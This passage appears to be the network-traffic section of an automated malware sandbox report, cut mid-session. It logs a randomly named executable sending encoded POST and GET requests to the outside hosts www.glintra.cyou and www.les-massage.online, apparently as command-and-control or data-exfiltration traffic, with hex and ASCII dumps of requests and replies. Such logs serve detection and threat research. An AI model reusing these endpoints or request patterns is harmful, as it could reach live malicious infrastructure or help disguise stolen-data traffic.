y6v3l3qgSi129pvrB64LLkFfbHDSlwgMRY/vYc3cIBDoABWtcod1xFN6SCetl7mCDIGJveAEzFDEf8QcWcPCwdyp1261aWye4NEVV8sEDA5r [TRUNCATED]
                                                      Sep 19, 2024 15:06:34.174506903 CEST228OUTData Raw: 6b 4f 4e 43 2b 49 6b 5a 57 75 45 31 6c 41 47 7a 6e 33 6f 4e 52 30 7a 65 72 6a 6b 48 54 46 48 51 61 74 4c 77 6a 48 72 38 77 50 49 70 69 4b 6d 79 49 39 70 79 41 6e 63 51 32 68 31 52 2b 72 35 62 75 4b 33 4b 5a 4c 57 2b 52 67 79 37 6b 62 58 41 43 5a
                                                      Data Ascii: kONC+IkZWuE1lAGzn3oNR0zerjkHTFHQatLwjHr8wPIpiKmyI9pyAncQ2h1R+r5buK3KZLW+Rgy7kbXACZU0Ksju6drHg7hdpZwPXHif3BciquR6/gR3PfrhU3OirS8S5K+V+HYAFrVuxDkfc1r+5dfqXkwXlE29779RSXA07i5lwyiMj/WyRUwjL/WxFDCkfJ4aHDqNBb4HmHXTkSy9cf8cgxzeTs5uVAkE


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.224919284.32.84.32802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:36.718750954 CEST739OUTPOST /eaxv/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.glintra.cyou
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.glintra.cyou
                                                      Referer: http://www.glintra.cyou/eaxv/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 57 46 64 34 46 4a 76 4a 70 4c 78 37 4f 48 56 6e 2b 36 44 4e 74 6c 57 55 73 52 59 6d 56 47 36 72 79 74 6c 77 39 70 73 2f 46 30 68 54 57 32 42 30 50 56 71 6e 6a 41 4a 6f 47 2b 35 34 58 30 71 35 69 76 77 66 68 52 6a 47 2b 6a 52 64 48 32 4a 35 69 71 51 62 69 79 6e 46 43 67 39 74 71 76 43 6e 78 30 53 72 6d 61 51 67 4c 46 77 6a 35 6c 32 6d 37 4b 74 42 45 47 69 44 46 71 74 6c 4e 47 4b 2b 76 45 69 71 56 68 41 75 70 56 62 5a 71 66 61 75 6d 62 4d 69 6a 48 35 75 30 6e 4c 59 33 64 4d 64 6a 31 72 32 59 32 66 6a 69 5a 57 4b 30 47 4c 44 55 37 42 47 42 37 71 52 65 7a 67 74 66 49 50 41 6e 41 3d 3d
                                                      Data Ascii: 00yp=WFd4FJvJpLx7OHVn+6DNtlWUsRYmVG6rytlw9ps/F0hTW2B0PVqnjAJoG+54X0q5ivwfhRjG+jRdH2J5iqQbiynFCg9tqvCnx0SrmaQgLFwj5l2m7KtBEGiDFqtlNGK+vEiqVhAupVbZqfaumbMijH5u0nLY3dMdj1r2Y2fjiZWK0GLDU7BGB7qRezgtfIPAnA==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.224919384.32.84.32802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:39.262733936 CEST2472OUTPOST /eaxv/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.glintra.cyou
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 3625
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.glintra.cyou
                                                      Referer: http://www.glintra.cyou/eaxv/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 57 46 64 34 46 4a 76 4a 70 4c 78 37 42 45 4e 6e 34 62 44 4e 72 46 57 54 77 42 59 6d 61 6d 36 76 79 74 5a 77 39 73 4d 76 46 42 35 54 57 41 64 30 50 33 79 6e 68 41 4a 6f 41 2b 35 38 4a 45 72 77 69 76 6b 35 68 51 54 34 2b 68 64 64 46 56 68 35 6b 70 34 63 33 53 6e 4c 47 67 39 69 71 76 44 6a 78 30 44 67 6d 61 6c 46 4c 46 6f 6a 35 33 75 6d 72 71 74 65 59 57 69 44 46 71 74 70 4e 47 4b 65 76 45 61 69 56 67 49 2b 70 41 66 5a 74 2b 36 75 6b 34 6b 6a 33 33 35 71 37 33 4b 53 33 65 78 68 69 56 79 39 55 6d 4c 36 6b 62 6d 38 77 6c 33 34 4e 6f 6c 36 47 35 7a 34 58 6a 78 6b 57 61 6d 6e 6c 77 34 32 42 79 39 2f 74 6d 36 6a 6b 79 39 4e 33 54 58 55 33 69 61 55 79 4d 64 54 53 65 4a 58 46 39 6e 57 5a 34 72 6d 57 41 4b 77 50 35 77 65 75 71 39 77 59 42 32 5a 2f 39 35 38 4e 48 61 33 6a 77 35 68 48 53 53 56 64 45 42 64 71 63 65 2f 30 6d 6f 55 31 62 47 48 5a 4b 77 46 6e 69 66 44 2b 32 32 50 70 43 64 77 67 32 6b 50 31 64 51 6c 48 6f 70 39 44 62 54 53 75 73 73 31 48 78 56 2f 46 2b 57 37 54 58 2f 39 61 36 45 67 71 [TRUNCATED]
                                                      Data Ascii: 00yp=WFd4FJvJpLx7BENn4bDNrFWTwBYmam6vytZw9sMvFB5TWAd0P3ynhAJoA+58JErwivk5hQT4+hddFVh5kp4c3SnLGg9iqvDjx0DgmalFLFoj53umrqteYWiDFqtpNGKevEaiVgI+pAfZt+6uk4kj335q73KS3exhiVy9UmL6kbm8wl34Nol6G5z4XjxkWamnlw42By9/tm6jky9N3TXU3iaUyMdTSeJXF9nWZ4rmWAKwP5weuq9wYB2Z/958NHa3jw5hHSSVdEBdqce/0moU1bGHZKwFnifD+22PpCdwg2kP1dQlHop9DbTSuss1HxV/F+W7TX/9a6EgqkL6rl7NusAAKvtwy0aoxtBWJaoFpwVUlmOH06+dq8BiBACenwxGsCVLhSGARFpWidOX/qdH/emfJLdvTkVq/NVmi6Q2gqXC3bODCNSr2IPbQuaslSUV4B9zDXQkD0IIDKtAm3zxuh1WeOAzPZK5Q1avQG+cTQjHvXFZm0QVUDbB4DxaWAnCeU15xrJVKITzRKMYWbQyh8Zw41RqRRA/x5ol9yxapyHf0HjbKVza4wSV2Eg/hg+0LgZUrEWon12JHBEF+hkFMIyt4zleDTfgHFi+GeYFRYaa624bxcV9SFfjnSCxB5lvkR8ovYXBBw7dz6tGvQWKdvNEPlUKXZze4Yk2OPzWu4kjtGXnSuyPHUkVrSnUo/A4439zW8RWEtrFX3caXJfrWRr7WrRQDjvldsKpFi9JXZSDhd9+lQhEREwR3nmV/aw+GYLCToWYloVuRNxRNDcrGeze8Z2ZgCwPiUTmpDBYy4eeg2hAYg/JZMXDK6a/rRkLBTjQzwRAeJz3KLtDBD3MFKlVCdmqzZ/PkGVyaycdRQUeR2aZB19anGeOmTJZ9hA4IHd56qHT3vMSjG+9usTG4ILK11fBJjuAwgxMY7vYcA0IARAAGmtchd1yNt69a/R57mPkIHY3fxUzXA8f+XIVRfCxDypN26JpWyGwNEdF8roDAZr [TRUNCATED]
                                                      Sep 19, 2024 15:06:39.268260002 CEST1692OUTData Raw: 6b 4f 64 43 2b 4c 41 5a 56 65 45 32 34 41 47 49 71 58 6f 4b 4c 45 79 46 72 6a 6c 30 54 46 62 71 61 74 76 77 69 56 54 38 35 64 77 70 6a 36 6d 77 54 4e 6f 75 58 33 52 56 32 68 78 6e 2b 71 4a 74 75 37 58 4b 59 35 2b 2b 53 69 61 37 7a 72 58 4e 4b 35
                                                      Data Ascii: kOdC+LAZVeE24AGIqXoKLEyFrjl0TFbqatvwiVT85dwpj6mwTNouX3RV2hxn+qJtu7XKY5++Sia7zrXNK5UDKsnW6dbbg6w2po8PX3ifzD0h8eR46gRwPfqIU3WurXEC5LmV+FwAEbVtyzkdf1q55djPXk45lEm976hRT2w08i5l8SiJufWvSksgL93LaUypV+ceLRS/KZo43VHvlTeGH+VC3zbJMI11E3Fs+bpUI7Noi5p7Pzd


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.224919484.32.84.32802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:41.797487974 CEST473OUTGET /eaxv/?00yp=bH1YG+zUiphgWlE6z5XKm1634D4xd3mXx7VGnNY2K0RSGQ9xBXqow0pPHKhWVXfXj/YC8GTm7XZkAlB3qbMa7XLrOSxMydPR+Fuoje1qC1dI5FzP/s9gH3iBDNgT&8Xv=VLHph HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.glintra.cyou
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:06:42.251146078 CEST1236INHTTP/1.1 200 OK
                                                      Server: hcdn
                                                      Date: Thu, 19 Sep 2024 13:06:42 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 10072
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      alt-svc: h3=":443"; ma=86400
                                                      x-hcdn-request-id: 64bae5d45c7494632581738d9d7a6151-bos-edge2
                                                      Expires: Thu, 19 Sep 2024 13:06:41 GMT
                                                      Cache-Control: no-cache
                                                      Accept-Ranges: bytes
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                      Sep 19, 2024 15:06:42.251163960 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                      Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                      Sep 19, 2024 15:06:42.251174927 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                      Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                      Sep 19, 2024 15:06:42.251262903 CEST672INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                      Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                      Sep 19, 2024 15:06:42.251275063 CEST1236INData Raw: 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77
                                                      Data Ascii: sync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32
                                                      Sep 19, 2024 15:06:42.251286030 CEST1236INData Raw: 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 65 6d 70 74 79 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61
                                                      Data Ascii: ogin</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</di
                                                      Sep 19, 2024 15:06:42.251297951 CEST1236INData Raw: 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 61 72 74 69 63 6c 65 73 2f 31 35 38 33 32 31 34 2d 68 6f 77 2d 74 6f 2d 61 64 64 2d 61 2d 64 6f 6d 61 69 6e 2d 74 6f 2d 6d 79 2d 61 63 63 6f 75 6e 74 2d 68 6f 77 2d 74 6f 2d
                                                      Data Ascii: upport.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change
                                                      Sep 19, 2024 15:06:42.251310110 CEST1236INData Raw: 68 2e 66 6c 6f 6f 72 28 72 2f 37 30 30 29 3a 72 3e 3e 31 2c 72 2b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 65 29 2c 74 3d 30 3b 34 35 35 3c 72 3b 74 2b 3d 6f 29 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 33 35 29 3b 72 65 74 75 72 6e 20 4d 61
                                                      Data Ascii: h.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c
                                                      Sep 19, 2024 15:06:42.251322031 CEST1088INData Raw: 5d 3d 74 5b 64 5d 21 3d 77 5b 64 5d 3b 76 61 72 20 6d 2c 79 3d 5b 5d 3b 66 6f 72 28 68 3d 31 32 38 2c 75 3d 37 32 2c 64 3d 66 3d 30 3b 64 3c 76 3b 2b 2b 64 29 74 5b 64 5d 3c 31 32 38 26 26 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43
                                                      Data Ascii: ]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.2249195194.58.112.174802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:47.381531954 CEST2472OUTPOST /qqaq/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.les-massage.online
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 2161
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.les-massage.online
                                                      Referer: http://www.les-massage.online/qqaq/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 34 74 66 57 47 4c 53 72 66 51 39 37 4f 67 69 50 54 49 2f 75 63 64 31 68 6a 54 52 57 6d 43 71 35 6d 46 65 4e 34 5a 66 65 63 61 72 4d 49 69 35 66 6c 69 6e 66 49 46 43 39 65 52 44 33 53 2b 32 66 73 65 79 49 6d 32 38 56 55 35 55 41 6f 73 38 31 36 71 73 65 4a 77 41 71 6f 35 72 63 63 67 56 66 4e 74 6a 67 7a 69 30 6b 78 5a 4b 66 31 71 78 6b 70 48 71 54 34 71 76 6e 72 41 78 46 74 31 79 46 44 65 2f 46 39 78 34 45 41 48 6f 66 4b 70 68 46 47 49 6d 7a 4f 71 75 61 32 62 43 7a 4d 42 5a 36 62 72 35 50 4b 44 42 79 35 4f 71 2b 62 62 55 4d 2f 74 78 76 4f 59 76 6f 2b 6d 69 52 4d 41 44 33 2f 4c 6f 78 39 69 33 46 59 36 4a 34 72 37 54 4f 4c 4c 32 69 4d 4e 31 52 55 35 74 55 57 6a 38 43 5a 67 41 69 65 6a 36 38 70 59 4f 6d 71 6c 53 4b 4e 54 45 42 65 78 41 75 4f 47 55 6a 73 6f 6f 77 45 68 69 7a 4b 2f 52 73 58 79 4d 44 74 35 31 55 50 42 45 62 75 77 48 47 32 43 49 76 52 38 42 4f 7a 5a 46 53 30 41 70 47 54 46 2b 6d 75 58 6b 4e 58 6b 6b 39 2f 79 6f 55 64 44 37 79 4a 42 32 63 30 71 39 77 78 36 2b 4b 31 6e 63 72 6d [TRUNCATED]
                                                      Data Ascii: 00yp=4tfWGLSrfQ97OgiPTI/ucd1hjTRWmCq5mFeN4ZfecarMIi5flinfIFC9eRD3S+2fseyIm28VU5UAos816qseJwAqo5rccgVfNtjgzi0kxZKf1qxkpHqT4qvnrAxFt1yFDe/F9x4EAHofKphFGImzOqua2bCzMBZ6br5PKDBy5Oq+bbUM/txvOYvo+miRMAD3/Lox9i3FY6J4r7TOLL2iMN1RU5tUWj8CZgAiej68pYOmqlSKNTEBexAuOGUjsoowEhizK/RsXyMDt51UPBEbuwHG2CIvR8BOzZFS0ApGTF+muXkNXkk9/yoUdD7yJB2c0q9wx6+K1ncrmriUW5KqXPDsLRYLGOcW4gSHyJYPoAuUSjK6OM/zf1V3wNUw5m5Nm8DTgNKfDZPNr1e50WtTipGs2mShJiWYTSbIWtOWcZnP+1Tt+uZ9LLI30YqQ+aR/iaf2ni47DOIv0hP1NGZ0NyqE8cirVkrCWT94+NT2B9AsAAVAqYTIDTcBt6R5goQU7M0AnrNzsSCZhL5HxldhJ/WpJNpb/p15pELtqHPC+kANeXWIIQDsIj/N91rdwVOszQeQMb8f0wiP66zM1llm5u286KSQyLSyNCnUWDP/iN/7uTYkKhVaVEKO8jJ8u9cTzdiIF0CZ2tqCnw0PgQ90B06GMDXrfDamfoW9B2lyCz9CM5GkbCoakA19n4mFww2XOHCuiJGPZUP9TI8kGXZeGRaB3P+5NSQ/IlxeYCFnrROJq5u2hvot+qC6Db/6bAayxDqrtsorEhTQYOlVHkNymcNM2gIvJA1gCOuXEnBEOmojbQ91VJ+9QjXBG47zmUuw/WvSaIIIoBqPhQIJN03rUnqHNsOrQB8bY6OUVowd5ADg7C6O2BB3zsMA72MiPhQz9NlVv9+D18z1MUYVezK7cN6KlE0XroJFRi8Y/G/Ui5GpozEYxbZY1be6xvDxWneP6dSRlqr/73WzQSCoYuzYAjz8LWYM2AnMvMOuWaq/6Cs3fdH [TRUNCATED]
                                                      Sep 19, 2024 15:06:47.386786938 CEST246OUTData Raw: 57 63 37 45 77 79 63 4a 45 70 74 56 37 36 41 36 2f 6e 4a 75 6a 34 32 4f 51 4f 4c 43 31 74 6f 4a 42 38 53 2f 55 63 57 59 6e 65 59 75 78 72 44 2f 68 4b 71 73 61 5a 6b 7a 52 2f 39 43 69 65 52 63 78 62 63 57 2b 79 68 59 65 74 61 50 42 6e 67 75 62 70
                                                      Data Ascii: Wc7EwycJEptV76A6/nJuj42OQOLC1toJB8S/UcWYneYuxrD/hKqsaZkzR/9CieRcxbcW+yhYetaPBngubpR2Cjlyx5EzNQxYFerd+t+FGogJsx5jiQuEse8UOZt1p49XGladG+DOItvgBFcyUOndeeU2US5iTo+MYVR3PTDt+b6MKCm6JjX00myuiPdyv9o035wRGIiNfXCQ0+Ss87KoP28sNf+PvTg4YdJp76FmUh94lU4Tbbx
                                                      Sep 19, 2024 15:06:48.085787058 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Thu, 19 Sep 2024 13:06:47 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 68 0c 20 b4 ec 2a d3 f7 5c c7 53 75 4b d7 d6 f1 a5 2f 02 e5 36 4a 61 34 46 bb 9e 52 98 68 a0 3a 8e 6c 94 a4 eb 96 44 2f 50 1b b9 b8 2c 9e 21 47 91 6f da 61 88 49 26 fd 1d 2c 24 6b bd 21 21 99 ef 99 f8 b3 ba 5c 12 a4 41 28 6c 80 f9 ad 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe [TRUNCATED]
                                                      Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktUh *\SuK/6Ja4FRh:lD/P,!GoaI&,$k!!\A(l+7lC;pQ:V?~KYGoQ 7hgGUW]<ftt0y4JHPad%WAPvTv<6,#mSQd4b~gama+|\|j-"RAqnj4T=E}\DL$x7 ;TJ=mj3h,[J~xA!hv3y?YdnabJ}pAS[FlF#d0S6NmX`j(-dr>\4nz;h`d`=>\(|/4`+!3~b;+&j9Rs4CP-3="i?k;jo,u8X%9W+GohB(O?NN,OmYhI@~jAf4d_"NkPiao#gpPzsp;opt*P9*LEd>=TV'tUq{''b)eM+nw*RB [TRUNCATED]
                                                      Sep 19, 2024 15:06:48.085810900 CEST1236INData Raw: 1a 7d 4f db a7 b3 4e cc 5f a0 59 17 b9 55 d0 75 bc 96 ab 36 22 43 fb 37 26 8c 02 df eb 3e dd 28 e0 64 c0 dd a6 90 f6 2f a0 17 f1 0b ea 7d 1c df 03 ce 78 84 29 ae 9d 75 5f ad 9c 70 d4 d6 26 cf 25 69 fb 60 bd 01 22 a6 a7 30 ee 9f 11 07 ef 27 5f c2
                                                      Data Ascii: }ON_YUu6"C7&>(d/}x)u_p&%i`"0'_E'`&Iu$(Oud4N&Hz_2&Irk>P$G!+b8)o3BknQ.\#9Z/C$bE;`mAi
                                                      Sep 19, 2024 15:06:48.085822105 CEST1236INData Raw: f1 54 56 89 0c f8 9f 44 9e cc 79 a0 2e 1d 93 45 9e 9a a6 10 e3 44 7c 31 20 b3 bd 39 a7 b4 20 3f 0a f1 94 14 14 93 5a 24 d1 9c 22 70 96 5c 38 b2 40 73 a4 c8 e0 f4 47 e0 d1 4f 39 f4 63 af cb 60 87 3c 47 45 fc 0d 77 03 a8 75 de 01 0a af 61 ff 9c 6f
                                                      Data Ascii: TVDy.ED|1 9 ?Z$"p\8@sGO9c`<GEwuao)7xX\`s|d:OYzwq")1=,8bUsO@tFkipj!]:LTa+z90y8cm^Anev;2SzD~QTn=%.(pP}p*Lu
                                                      Sep 19, 2024 15:06:48.085833073 CEST114INData Raw: 7a 25 f7 2a 2c 64 ab 42 2d 8e 1b 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 41 8c 73 69 67 d0 d5 2f da e6 ae 64 8b 42 98 95 c9 8b b7 6f 74 bc 8d c7 80 3e 1c 0b ef 7b ce ca 76 e8 bb a3 48 ad 08 ba 24 39 6b 9c c1 cf f0 ca 4a 49 48 17 cf a3 c8 11 74 c2
                                                      Data Ascii: z%*,dB-6^4gAsig/dBot>{vH$9kJIHt>0f2{/&3)0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.2249196194.58.112.174802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:50.097117901 CEST757OUTPOST /qqaq/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.les-massage.online
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.les-massage.online
                                                      Referer: http://www.les-massage.online/qqaq/
